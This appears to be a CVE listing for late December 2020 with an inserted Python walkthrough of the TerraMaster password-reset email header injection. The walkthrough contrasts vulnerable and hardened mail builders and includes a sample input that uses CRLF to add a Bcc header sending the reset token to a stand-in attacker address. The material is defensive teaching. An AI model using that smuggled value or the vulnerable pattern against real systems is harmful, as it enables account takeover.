2020-12-23 | CVE-2020-29550 | Urve | Cleartext Storage of Sensitive Information vulnerability in Urve 24.03.2020 An issue was discovered in URVE Build 24.03.2020. | 7.5 |
2020-12-23 | CVE-2020-35586 | Mersive | Improper Restriction of Excessive Authentication Attempts vulnerability in Mersive Solstice POD Firmware In Solstice Pod before 3.3.0 (or Open4.3), the Administrator password can be enumerated using brute-force attacks via the /Config/service/initModel?password= Solstice Open Control API because there is no complexity requirement (e.g., it might be all digits or all lowercase letters). | 7.5 |
2020-12-23 | CVE-2020-35585 | Mersive | Improper Restriction of Excessive Authentication Attempts vulnerability in Mersive Solstice POD Firmware In Solstice Pod before 3.3.0 (or Open4.3), the screen key can be enumerated using brute-force attacks via the /lookin/info Solstice Open Control API because there are only 1.7 million possibilities. | 7.5 |
2020-12-23 | CVE-2020-25153 | Moxa | Weak Password Requirements vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in web service for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower does not require users to have strong passwords. | 7.5 |
2020-12-22 | CVE-2020-24580 | Dlink | Missing Authentication for Critical Function vulnerability in Dlink Dsl2888A Firmware An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. | 7.5 |
2020-12-21 | CVE-2020-35623 | Mediawiki | Use of Incorrectly-Resolved Name or Reference vulnerability in Mediawiki An issue was discovered in the CasAuth extension for MediaWiki through 1.35.1. | 7.5 |
2020-12-21 | CVE-2020-29596 | Miniweb Http Server Project | Classic Buffer Overflow vulnerability in Miniweb Http Server Project Miniweb Http Server 0.8.19 MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the first parameter in a POST request. | 7.5 |
2020-12-21 | CVE-2020-26281 | Rust Lang | Unspecified vulnerability in Rust-Lang Async-H1 async-h1 is an asynchronous HTTP/1.1 parser for Rust (crates.io). | 7.5 |
2020-12-21 | CVE-2018-7580 | Philips | Resource Exhaustion vulnerability in Philips HUE Firmware Philips Hue is vulnerable to a Denial of Service attack. | 7.5 |
2020-12-21 | CVE-2020-6882 | ZTE | Use of Hard-coded Credentials vulnerability in ZTE products ZTE E8810/E8820/E8822 series routers have an information leak vulnerability, which is caused by hard-coded MQTT service access credentials on the device. | 7.5 |
2020-12-21 | CVE-2020-6881 | ZTE | Origin Validation Error vulnerability in ZTE products ZTE E8810/E8820/E8822 series routers have an MQTT DoS vulnerability, which is caused by the failure of the device to verify the validity of abnormal messages. | 7.5 |
2020-12-21 | CVE-2020-5808 | Tenable | Unspecified vulnerability in Tenable Tenable.Sc In certain scenarios in Tenable.sc prior to 5.17.0, a scanner could potentially be used outside the user's defined scan zone without a particular zone being specified within the Automatic Distribution configuration. | 7.5 |
2020-12-21 | CVE-2020-4870 | IBM | Unspecified vulnerability in IBM MQ 9.2.0 IBM MQ 9.2 CD and LTS are vulnerable to a denial of service attack caused by an error processing connecting applications. | 7.5 |
2020-12-21 | CVE-2020-27254 | Emerson | Improper Authentication vulnerability in Emerson products Emerson Rosemount X-STREAM Gas Analyzer and X-STREAM enhanced XEGP, XEGK, XEFD, XEXF (all revisions): the affected products are vulnerable to improper authentication for accessing log and backup data, which could allow an attacker with a specially crafted URL to obtain access to sensitive information. | 7.5 |
2020-12-21 | CVE-2020-26263 | Tlslite NG Project | Unspecified vulnerability in Tlslite-Ng Project Tlslite-Ng tlslite-ng is an open source python library that implements SSL and TLS cryptographic protocols. | 7.5 |
2020-12-23 | CVE-2020-11718 | Bilanc | Cleartext Transmission of Sensitive Information vulnerability in Bilanc 01431.01.2020 An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and below. | 7.4 |
2020-12-24 | CVE-2020-28186 | Terra Master | Weak Password Recovery Mechanism for Forgotten Password vulnerability in Terra-Master TOS Email Injection in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to abuse the forget password functionality and achieve account takeover. | 7.3 |
2020-12-22 | CVE-2020-27337 | Treck | Out-of-bounds Write vulnerability in Treck Ipv6 An issue was discovered in Treck IPv6 before 6.0.1.68. | 7.3 |
2020-12-27 | CVE-2020-29299 | Zyxel | Command Injection vulnerability in Zyxel products Certain Zyxel products allow command injection by an admin via an input string to chg_exp_pwd during a password-change action. | 7.2 |
2020-12-25 | CVE-2020-35708 | Phplist | SQL Injection vulnerability in PHPlist 3.5.9 phpList 3.5.9 allows SQL injection by admins who provide a crafted fourth line of a file to the "Config - Import Administrators" page. | 7.2 |
2020-12-24 | CVE-2020-2499 | Qnap | Use of Hard-coded Credentials vulnerability in Qnap QES A hard-coded password vulnerability has been reported to affect earlier versions of QES. | 7.2 |
2020-12-23 | CVE-2020-35136 | Dolibarr | Argument Injection or Modification vulnerability in Dolibarr Erp/Crm 12.0.3 Dolibarr 12.0.3 is vulnerable to authenticated Remote Code Execution. | 7.2 |
2020-12-23 | CVE-2020-35657 | Jaws Project | Unrestricted Upload of File with Dangerous Type vulnerability in Jaws Project Jaws 1.8.0 Jaws through 1.8.0 allows remote authenticated administrators to execute arbitrary code via crafted use of UploadTheme to upload a theme ZIP archive containing a .php file that is able to execute OS commands. | 7.2 |
2020-12-23 | CVE-2020-35656 | Jaws Project | Unrestricted Upload of File with Dangerous Type vulnerability in Jaws Project Jaws 1.8.0 Jaws through 1.8.0 allows remote authenticated administrators to execute arbitrary code via crafted use of admin.php?reqGadget=Components&reqAction=InstallGadget&comp=FileBrowser and admin.php?reqGadget=FileBrowser&reqAction=Files to upload a .php file. | 7.2 |
2020-12-22 | CVE-2020-28641 | Malwarebytes | Link Following vulnerability in Malwarebytes Endpoint Protection and Malwarebytes In Malwarebytes Free 4.1.0.56, a symbolic link may be used to delete an arbitrary file on the system by exploiting the local quarantine system. | 7.1 |
2020-12-22 | CVE-2020-27338 | Treck | Out-of-bounds Read vulnerability in Treck Ipv6 An issue was discovered in Treck IPv6 before 6.0.1.68. | 7.1 |
2020-12-24 | CVE-2020-28912 | Mariadb | Unspecified vulnerability in Mariadb With MariaDB running on Windows, when local clients connect to the server over named pipes, it's possible for an unprivileged user with an ability to run code on the server machine to intercept the named pipe connection and act as a man-in-the-middle, gaining access to all the data passed between the client and the server, and getting the ability to run SQL commands on behalf of the connected user. | 7.0 |
2020-12-24 | CVE-2020-28169 | TD Agent Builder Project Debian | Incorrect Permission Assignment for Critical Resource vulnerability in multiple products The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM. | 7.0 |
2020-12-22 | CVE-2020-24680 | ABB | Insufficiently Protected Credentials vulnerability in ABB Symphony + Historian and Symphony + Operations In S+ Operations and S+ Historian, the passwords of internal users (not Windows Users) are encrypted but improperly stored in a database. | 7.0 |
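The TerraMaster entry above (CVE-2020-28186) describes an email injection in a forgot-password flow leading to account takeover. The pattern behind that class of bug is a reset mailer that copies request input into mail header lines, so a CR LF in the input adds a recipient. The following Python is an added example written for this report, not TerraMaster's code and not derived from the advisory: the addresses, the account store and the message layout are constructed stand-ins. It shows the vulnerable concatenation beside a hardened version that takes the recipient from the account record, rejects control characters and display names, and builds the message with `EmailMessage` instead of string formatting.

```python
import re
from email.message import EmailMessage
from email.utils import parseaddr

# Constructed sample inputs (not taken from the advisory): a normal address and
# one that smuggles an extra header through an embedded CRLF.
BENIGN = "alice@example.com"
INJECTED = "alice@example.com\r\nBcc: attacker@evil.example"

# Constructed stand-in for the account store of a hypothetical appliance.
ACCOUNTS = {"alice": "alice@example.com"}


def build_reset_mail_vulnerable(recipient: str, token: str) -> str:
    """Vulnerable pattern: request-supplied text is concatenated into header lines.

    A CR LF inside `recipient` ends the To: header and starts a new one, so the
    reset link is also delivered to whatever the attacker appended.
    """
    return (
        f"To: {recipient}\r\n"
        "Subject: Password reset\r\n"
        "\r\n"
        f"Reset link: https://nas.example/reset?token={token}\r\n"
    )


def parse_headers(raw_message: str) -> dict:
    """Split an RFC 5322 message into {header-name: [values]} the way an MTA would."""
    head, _, _ = raw_message.partition("\r\n\r\n")
    headers: dict = {}
    for line in head.split("\r\n"):
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


# Deliberately strict: one bare mailbox, no display name, no comments.
_BARE_ADDR = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def validate_address(addr: str) -> str:
    """Accept exactly one bare mailbox; reject control characters and display names."""
    if any(ch in addr for ch in "\r\n\0"):
        raise ValueError("control character in address")
    display_name, bare = parseaddr(addr)
    if display_name or bare != addr or not _BARE_ADDR.match(bare):
        raise ValueError("not a single bare address")
    return bare


def build_reset_mail_hardened(username: str, token: str) -> str:
    """Hardened pattern: the recipient comes from the account record (never from
    the request), is validated, and is set through EmailMessage rather than
    string concatenation."""
    recipient = validate_address(ACCOUNTS[username])
    msg = EmailMessage()
    msg["To"] = recipient
    msg["Subject"] = "Password reset"
    msg.set_content(f"Reset link: https://nas.example/reset?token={token}\n")
    return msg.as_string()


if __name__ == "__main__":
    leaked = parse_headers(build_reset_mail_vulnerable(INJECTED, "t0k3n"))
    print("vulnerable build adds header bcc =", leaked.get("bcc"))
    try:
        validate_address(INJECTED)
    except ValueError as exc:
        print("hardened build rejects the same input:", exc)
    print(build_reset_mail_hardened("alice", "t0k3n"))
```

The decisive control is the first line of the hardened builder: a reset link only ever goes to the address already on file for the account, so even a recipient field that survives validation cannot redirect the token. The validation and the `EmailMessage` API are defence in depth for other places where an address is accepted from a request.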
87 Medium Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2020-12-24 | CVE-2020-9137 | Huawei | Improper Input Validation vulnerability in Huawei products There is a privilege escalation vulnerability in some versions of CloudEngine 12800,CloudEngine 5800,CloudEngine 6800 and CloudEngine 7800. | 6.7 |
2020-12-21 | CVE-2020-25860 | Pengutronix | Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Pengutronix Rauc The install.c module in the Pengutronix RAUC update client prior to version 1.5 has a Time-of-Check Time-of-Use vulnerability, where signature verification on an update file takes place before the file is reopened for installation. | 6.6 |
2020-12-26 | CVE-2020-35347 | Cxuu | Cross-Site Request Forgery (CSRF) vulnerability in Cxuu Cxuucms 3.1 CXUUCMS V3 3.1 has a CSRF vulnerability that can add an administrator account via admin.php?c=adminuser&a=add. | 6.5 |
2020-12-26 | CVE-2020-20412 | Xiph ORG Stepmania | Improper Validation of Array Index vulnerability in multiple products lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file. | 6.5 |
2020-12-24 | CVE-2020-9201 | Huawei | Out-of-bounds Read vulnerability in Huawei products There is an out-of-bounds read vulnerability in some versions of NIP6800, Secospace USG6600 and USG9500. | 6.5 |
2020-12-24 | CVE-2020-27722 | F5 | Resource Exhaustion vulnerability in F5 Big-Ip Access Policy Manager In BIG-IP APM versions 15.0.0-15.0.1.3, 14.1.0-14.1.3, and 13.1.0-13.1.3.4, under certain conditions, the VDI plugin does not observe plugin flow-control protocol causing excessive resource consumption. | 6.5 |
2020-12-24 | CVE-2020-27724 | F5 | Resource Exhaustion vulnerability in F5 Big-Ip Access Policy Manager In BIG-IP APM versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, on systems running more than one TMM instance, authenticated VPN users may consume excessive resources by sending specially-crafted malicious traffic over the tunnel. | 6.5 |
2020-12-22 | CVE-2020-24578 | Dlink | Incorrect Permission Assignment for Critical Resource vulnerability in Dlink Dsl2888A Firmware An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. | 6.5 |
2020-12-22 | CVE-2019-11784 | Odoo | Missing Authorization vulnerability in Odoo Improper access control in mail module (notifications) in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote authenticated users to obtain access to arbitrary messages in conversations they were not a party to. | 6.5 |
2020-12-22 | CVE-2019-11783 | Odoo | Missing Authorization vulnerability in Odoo Improper access control in mail module (channel partners) in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote authenticated users to subscribe to arbitrary mail channels uninvited. | 6.5 |
2020-12-22 | CVE-2019-11782 | Odoo | Unspecified vulnerability in Odoo Improper access control in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote authenticated users with access to contact management to modify user accounts, leading to privilege escalation. | 6.5 |
2020-12-22 | CVE-2018-15645 | Odoo | Incorrect Permission Assignment for Critical Resource vulnerability in Odoo Improper access control in message routing in Odoo Community 12.0 and earlier and Odoo Enterprise 12.0 and earlier allows remote authenticated users to create arbitrary records via crafted payloads, which may allow privilege escalation. | 6.5 |
2020-12-21 | CVE-2020-14225 | Hcltechsw Hcltech | HCL iNotes is susceptible to a Tabnabbing vulnerability caused by improper sanitization of message content. | 6.5 |
2020-12-21 | CVE-2020-35497 | Ovirt Redhat | A flaw was found in ovirt-engine 4.4.3 and earlier allowing an authenticated user to read other users' personal information, including name, email and public SSH key. | 6.5 |
2020-12-21 | CVE-2020-3999 | Vmware | Improper Input Validation vulnerability in VMWare Esxi, Fusion and Workstation VMware ESXi (7.0 prior to ESXi70U1c-17325551), VMware Workstation (16.x prior to 16.0 and 15.x prior to 15.5.7), VMware Fusion (12.x prior to 12.0 and 11.x prior to 11.5.7) and VMware Cloud Foundation contain a denial of service vulnerability due to improper input validation in GuestInfo. | 6.5 |
2020-12-21 | CVE-2019-16959 | Solarwinds | Improper Neutralization of Formula Elements in a CSV File vulnerability in Solarwinds Webhelpdesk 12.7.0 SolarWinds Web Help Desk 12.7.0 allows CSV Injection, also known as Formula Injection, via a file attached to a ticket. | 6.5 |
2020-12-21 | CVE-2020-4757 | IBM | Cross-site Scripting vulnerability in IBM Content Navigator 3.0.0 IBM FileNet Content Manager and IBM Content Navigator 3.0.CD is vulnerable to stored cross-site scripting. | 6.4 |
2020-12-24 | CVE-2020-9119 | Huawei | Unspecified vulnerability in Huawei products There is a privilege escalation vulnerability on some Huawei smart phones due to design defects. | 6.2 |
2020-12-27 | CVE-2020-29250 | Cxuu | Cross-site Scripting vulnerability in Cxuu Cxuucms 3.0 CXUUCMS V3 allows XSS via the first and third input fields to /public/admin.php. | 6.1 |
2020-12-27 | CVE-2020-29249 | Cxuu | Cross-site Scripting vulnerability in Cxuu Cxuucms 3.0 CXUUCMS V3 allows class="layui-input" XSS. | 6.1 |
2020-12-27 | CVE-2020-29204 | Xuxueli | Cross-site Scripting vulnerability in Xuxueli Xxl-Job 2.2.0 XXL-JOB 2.2.0 allows Stored XSS (in Add User) to bypass the 20-character limit via xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java. | 6.1 |
2020-12-27 | CVE-2020-35678 | Crossbar | Open Redirect vulnerability in Crossbar Autobahn Autobahn|Python before 20.12.3 allows redirect header injection. | 6.1 |
2020-12-26 | CVE-2020-35437 | Intelliants | Cross-site Scripting vulnerability in Intelliants Subrion CMS 4.2.1 Subrion CMS 4.2.1 is affected by: Cross Site Scripting (XSS) through the avatar[path] parameter in a POST request to the /_core/profile/ URI. | 6.1 |
2020-12-26 | CVE-2020-29172 | Litespeedtech | Cross-site Scripting vulnerability in Litespeedtech Litespeed Cache A cross-site scripting (XSS) vulnerability in the LiteSpeed Cache plugin before 3.6.1 for WordPress can be exploited via the Server IP setting. | 6.1 |
2020-12-26 | CVE-2020-27515 | Techkshetrainfo | Cross-site Scripting vulnerability in Techkshetrainfo Savsoft Quiz 5.0 A Cross Site Scripting (XSS) vulnerability in Savsoft Quiz v5.0 allows remote attackers to inject arbitrary web script or HTML via the Skype ID field. | 6.1 |
2020-12-24 | CVE-2020-35659 | PI Hole | Cross-site Scripting vulnerability in Pi-Hole The DNS query log in Pi-hole before 5.2.2 is vulnerable to stored XSS. | 6.1 |
2020-12-24 | CVE-2020-27729 | F5 | Open Redirect vulnerability in F5 Big-Ip Access Policy Manager In versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, an undisclosed link on the BIG-IP APM virtual server allows a malicious user to build an open redirect URI. | 6.1 |
2020-12-24 | CVE-2020-27726 | F5 | Cross-site Scripting vulnerability in F5 Big-Ip Access Policy Manager In versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, and 12.1.0-12.1.5.2, a reflected cross-site scripting (XSS) vulnerability exists in the resource information page for authenticated users when a full webtop is configured on the BIG-IP APM system. | 6.1 |
2020-12-24 | CVE-2020-27719 | F5 | Cross-site Scripting vulnerability in F5 products On BIG-IP 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.3, a cross-site scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility. | 6.1 |
2020-12-24 | CVE-2020-35676 | Bigprof | Cross-site Scripting vulnerability in Bigprof Online Invoicing System BigProf Online Invoicing System before 3.1 fails to correctly sanitize an XSS payload when a user registers using the self-registration functionality. | 6.1 |
2020-12-24 | CVE-2020-35669 | Dart | Injection vulnerability in Dart Http An issue was discovered in the http package through 0.12.2 for Dart. | 6.1 |
2020-12-23 | CVE-2020-35252 | Egavilanmedia | Cross-site Scripting vulnerability in Egavilanmedia User Registration and Login System With Admin Panel 1.0 Cross Site Scripting (XSS) vulnerability via the 'Full Name' parameter in the User Registration section of User Registration & Login System with Admin Panel 1.0. | 6.1 |
2020-12-23 | CVE-2020-13969 | CRK | Cross-site Scripting vulnerability in CRK Business Platform 2019.1 CRK Business Platform <= 2019.1 allows reflected XSS via erro.aspx on 'CRK', 'IDContratante', 'Erro', or 'Mod' parameter. | 6.1 |
2020-12-23 | CVE-2020-9439 | Uncannyowl | Cross-site Scripting vulnerability in Uncannyowl TIN Canny Reporting for Learndash Multiple cross-site scripting (XSS) vulnerabilities in Uncanny Owl Tin Canny LearnDash Reporting before 3.4.4 allows authenticated remote attackers to inject arbitrary web script or HTML via the search_key GET Parameter in TinCan_Content_List_Table.php, message GET Parameter in licensing.php, tc_filter_group parameter in reporting-admin-menu.php, tc_filter_user parameter in reporting-admin-menu.php, tc_filter_course parameter in reporting-admin-menu.php, tc_filter_lesson parameter in reporting-admin-menu.php, tc_filter_module parameter in reporting-admin-menu.php, tc_filter_action parameter in reporting-admin-menu.php, tc_filter_data_range parameter in reporting-admin-menu.php, or tc_filter_data_range_last parameter in reporting-admin-menu.php. | 6.1 |
2020-12-23 | CVE-2020-6159 | Opera | Cross-site Scripting vulnerability in Opera 52.1.2517.139570/54.0.2669.49432 URLs using “javascript:” have the protocol removed when pasted into the address bar to protect users from cross-site scripting (XSS) attacks, but in certain circumstances this removal was not performed. | 6.1 |
2020-12-23 | CVE-2020-35650 | Uncannyowl | Cross-site Scripting vulnerability in Uncannyowl Uncanny Groups for Learndash Multiple cross-site scripting (XSS) vulnerabilities in Uncanny Groups for LearnDash before v3.7 allow authenticated remote attackers to inject arbitrary JavaScript or HTML via the ulgm_code_redeem POST Parameter in user-code-redemption.php, the ulgm_user_first POST Parameter in user-registration-form.php, the ulgm_user_last POST Parameter in user-registration-form.php, the ulgm_user_email POST Parameter in user-registration-form.php, the ulgm_code_registration POST Parameter in user-registration-form.php, the ulgm_terms_conditions POST Parameter in user-registration-form.php, the _ulgm_total_seats POST Parameter in frontend-uo_groups_buy_courses.php, the uncanny_group_signup_user_first POST Parameter in group-registration-form.php, the uncanny_group_signup_user_last POST Parameter in group-registration-form.php, the uncanny_group_signup_user_login POST Parameter in group-registration-form.php, the uncanny_group_signup_user_email POST Parameter in group-registration-form.php, the success-invited GET Parameter in frontend-uo_groups.php, the bulk-errors GET Parameter in frontend-uo_groups.php, or the message GET Parameter in frontend-uo_groups.php. | 6.1 |
2020-12-22 | CVE-2018-15634 | Odoo | Cross-site Scripting vulnerability in Odoo Cross-site scripting (XSS) issue in attachment management in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim via a crafted link. | 6.1 |
2020-12-22 | CVE-2018-15633 | Odoo | Cross-site Scripting vulnerability in Odoo Cross-site scripting (XSS) issue in "document" module in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim via crafted attachment filenames. | 6.1 |
2020-12-21 | CVE-2020-35622 | Mediawiki | Cross-site Scripting vulnerability in Mediawiki An issue was discovered in the GlobalUsage extension for MediaWiki through 1.35.1. | 6.1 |
2020-12-21 | CVE-2020-26277 | Dbdeployer | Unspecified vulnerability in Dbdeployer DBdeployer is a tool that deploys MySQL database servers easily. | 6.1 |
2020-12-21 | CVE-2020-4840 | IBM | Open Redirect vulnerability in IBM Security Secret Server 10.6 IBM Security Secret Server 10.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. | 6.1 |
2020-12-21 | CVE-2020-26275 | Jupyter | Unspecified vulnerability in Jupyter Server The Jupyter Server provides the backend (i.e. | 6.1 |
2020-12-21 | CVE-2020-26049 | Niftypm | Cross-site Scripting vulnerability in Niftypm Nifty-Pm Cpe2.3 Nifty-PM CPE 2.3 is affected by stored HTML injection. | 6.1 |
2020-12-24 | CVE-2020-28190 | Terra Master | Unspecified vulnerability in Terra-Master TOS TerraMaster TOS <= 4.2.06 was found to check for updates (of both system and applications) via an insecure channel (HTTP). | 5.9 |
2020-12-23 | CVE-2020-35584 | Mersive | Cleartext Transmission of Sensitive Information vulnerability in Mersive Solstice POD Firmware In Solstice Pod before 3.0.3, the web services allow users to connect to them over unencrypted channels via the Browser Look-in feature. | 5.9 |
2020-12-21 | CVE-2020-4841 | IBM | Missing Authorization vulnerability in IBM Security Secret Server 10.6 IBM Security Secret Server 10.6 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. | 5.9 |
2020-12-26 | CVE-2020-28759 | Tengine Project | Classic Buffer Overflow vulnerability in Tengine Project Tengine 1.0 The serializer module in OAID Tengine lite-v1.0 has a Buffer Overflow and crash. | 5.5 |
2020-12-26 | CVE-2020-29385 | Gnome Canonical Fedoraproject | Infinite Loop vulnerability in multiple products GNOME gdk-pixbuf (aka GdkPixbuf) before 2.42.2 allows a denial of service (infinite loop) in lzw.c in the function write_indexes. | 5.5 |
2020-12-23 | CVE-2020-4642 | IBM | Unspecified vulnerability in IBM DB2 IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow local attacker to cause a denial of service inside the "DB2 Management Service". | 5.5 |
2020-12-22 | CVE-2020-35609 | Microsoft | Infinite Loop vulnerability in Microsoft Azure Sphere 20.05 A denial-of-service vulnerability exists in the asynchronous ioctl functionality of Microsoft Azure Sphere 20.05. | 5.5 |
2020-12-25 | CVE-2020-35707 | Daybydaycrm | Cross-site Scripting vulnerability in Daybydaycrm Daybyday 2.1.0 Daybyday 2.1.0 allows stored XSS via the Company Name parameter to the New Client screen. | 5.4 |
2020-12-25 | CVE-2020-35706 | Daybydaycrm | Cross-site Scripting vulnerability in Daybydaycrm Daybyday 2.1.0 Daybyday 2.1.0 allows stored XSS via the Title parameter to the New Project screen. | 5.4 |
2020-12-25 | CVE-2020-35705 | Daybydaycrm | Cross-site Scripting vulnerability in Daybydaycrm Daybyday 2.1.0 Daybyday 2.1.0 allows stored XSS via the Name parameter to the New User screen. | 5.4 |
2020-12-25 | CVE-2020-35704 | Daybydaycrm | Cross-site Scripting vulnerability in Daybydaycrm Daybyday 2.1.0 Daybyday 2.1.0 allows stored XSS via the Title parameter to the New Lead screen. | 5.4 |
2020-12-24 | CVE-2020-28184 | Terra Master | Cross-site Scripting vulnerability in Terra-Master TOS Cross-site scripting (XSS) vulnerability in TerraMaster TOS <= 4.2.06 allows remote authenticated users to inject arbitrary web script or HTML via the mod parameter to /module/index.php. | 5.4 |
2020-12-24 | CVE-2020-2503 | Qnap | Cross-site Scripting vulnerability in Qnap QES If exploited, this stored cross-site scripting vulnerability could allow remote attackers to inject malicious code in File Station. | 5.4 |
2020-12-22 | CVE-2018-15641 | Odoo | Cross-site Scripting vulnerability in Odoo Cross-site scripting (XSS) issue in web module in Odoo Community 11.0 through 14.0 and Odoo Enterprise 11.0 through 14.0, allows remote authenticated internal users to inject arbitrary web script in the browser of a victim via crafted calendar event attributes. | 5.4 |
2020-12-22 | CVE-2018-15638 | Odoo | Cross-site Scripting vulnerability in Odoo Cross-site scripting (XSS) issue in mail module in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim via crafted channel names. | 5.4 |
2020-12-21 | CVE-2020-4794 | IBM | Incorrect Authorization vulnerability in IBM products IBM Automation Workstream Services 19.0.3, 20.0.1, 20.0.2, IBM Business Automation Workflow 18.0, 19.0, and 20.0 and IBM Business Process Manager 8.6 could allow an authenticated user to obtain sensitive information or cause a denial of service due to improper authorization checking. | 5.4 |
2020-12-21 | CVE-2020-4555 | IBM | Session Fixation vulnerability in IBM Financial Transaction Manager IBM Financial Transaction Manager 3.0.6 and 3.1.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. | 5.4 |
2020-12-21 | CVE-2020-35275 | Coastercms | Cross-site Scripting vulnerability in Coastercms 5.8.18 Coastercms v5.8.18 is affected by cross-site Scripting (XSS). | 5.4 |
2020-12-21 | CVE-2020-35589 | Limitloginattempts | Cross-site Scripting vulnerability in Limitloginattempts Limit Login Attempts Reloaded The limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows wp-admin/options-general.php?page=limit-login-attempts&tab= XSS. | 5.4 |
2020-12-27 | CVE-2020-29156 | Woocommerce | Authorization Bypass Through User-Controlled Key vulnerability in Woocommerce The WooCommerce plugin before 4.7.0 for WordPress allows remote attackers to view the status of arbitrary orders via the order_id parameter in a fetch_order_status action. | 5.3 |
2020-12-25 | CVE-2020-35710 | Parallels | Information Exposure vulnerability in Parallels Remote Application Server 18.0 Parallels Remote Application Server (RAS) 18 allows remote attackers to discover an intranet IP address because submission of the login form (even with blank credentials) provides this address to the attacker's client for use as a "host" value. | 5.3 |
2020-12-24 | CVE-2020-28185 | Terra Master | Unspecified vulnerability in Terra-Master TOS User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. | 5.3 |
2020-12-23 | CVE-2020-25192 | Moxa | Information Exposure vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower allows sensitive information to be displayed without proper authorization. | 5.3 |
2020-12-23 | CVE-2020-35658 | Titanhq | Cleartext Storage of Sensitive Information vulnerability in Titanhq Spamtitan SpamTitan before 7.09 allows attackers to tamper with backups, because backups are not encrypted. | 5.3 |
2020-12-22 | CVE-2020-27336 | Treck | Out-of-bounds Read vulnerability in Treck Ipv6 An issue was discovered in Treck IPv6 before 6.0.1.68. | 5.3 |
2020-12-22 | CVE-2020-14270 | Hcltech | Improper Handling of Exceptional Conditions vulnerability in Hcltech Domino HCL Domino v9, v10, v11 is susceptible to an Information Disclosure vulnerability in XPages due to improper error handling of user input. | 5.3 |
2020-12-21 | CVE-2020-35624 | Mediawiki | Information Exposure Through Discrepancy vulnerability in Mediawiki An issue was discovered in the SecurePoll extension for MediaWiki through 1.35.1. | 5.3 |
2020-12-21 | CVE-2020-26422 | Wireshark Oracle | Classic Buffer Overflow vulnerability in multiple products Buffer overflow in the QUIC dissector in Wireshark 3.4.0 to 3.4.1 allows denial of service via packet injection or a crafted capture file. | 5.3 |
2020-12-25 | CVE-2020-35709 | Bloofox | Path Traversal vulnerability in Bloofox Bloofoxcms 0.5.2.1 bloofoxCMS 0.5.2.1 allows admins to upload arbitrary .php files (with "Content-Type: application/octet-stream") to ../media/images/ via the admin/index.php?mode=tools&page=upload URI, aka directory traversal. | 4.9 |
2020-12-24 | CVE-2020-27727 | F5 | Improper Input Validation vulnerability in F5 products On BIG-IP version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, and 13.1.0-13.1.3.4, when an authenticated administrative user installs RPMs using the iAppsLX REST installer, the BIG-IP system does not sufficiently validate user input, allowing the user read access to the filesystem. | 4.9 |
2020-12-21 | CVE-2020-4842 | IBM | Information Exposure Through an Error Message vulnerability in IBM Security Secret Server 10.6 IBM Security Secret Server 10.6 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. | 4.9 |
2020-12-26 | CVE-2020-35349 | Techkshetrainfo | Cross-site Scripting vulnerability in Techkshetrainfo Savsoft Quiz 5.0 Savsoft Quiz 5 is affected by: Cross Site Scripting (XSS) via field_title (aka a title on the custom fields page). | 4.8 |
2020-12-26 | CVE-2020-35346 | Cxuu | Cross-site Scripting vulnerability in Cxuu Cxuucms 3.1 CXUUCMS V3 3.1 is affected by a reflected XSS vulnerability that allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of admin.php?c=content&a=add. | 4.8 |
2020-12-24 | CVE-2020-29247 | Wondercms | Cross-site Scripting vulnerability in Wondercms 3.1.3 WonderCMS 3.1.3 is affected by cross-site scripting (XSS) in the Admin Panel. | 4.8 |
2020-12-24 | CVE-2020-35677 | Bigprof | Cross-site Scripting vulnerability in Bigprof Online Invoicing System BigProf Online Invoicing System before 4.0 fails to adequately sanitize fields for HTML characters upon an administrator using admin/pageEditGroup.php to create a new group, resulting in Stored XSS. | 4.8 |
